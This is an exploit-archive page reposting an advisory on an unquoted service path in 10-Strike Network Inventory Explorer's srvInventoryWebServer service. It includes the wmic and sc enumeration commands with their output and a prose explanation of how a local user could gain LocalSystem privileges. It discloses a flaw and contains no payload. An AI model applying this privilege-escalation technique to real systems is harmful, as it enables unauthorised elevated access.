10strike network inventory explorer srvinventorywebserver unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-03-25 | Type : local | Platform : windows
This exploit / vulnerability 10strike network inventory explorer srvinventorywebserver unquoted service path is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Step to discover Unquoted Service Path:

C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto

# Service info:

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : srvInventoryWebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>

# Exploit:

# A successful attempt would require the local user to be able to insert their code in the
# system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local
# user's code would execute with the elevated privileges of the application.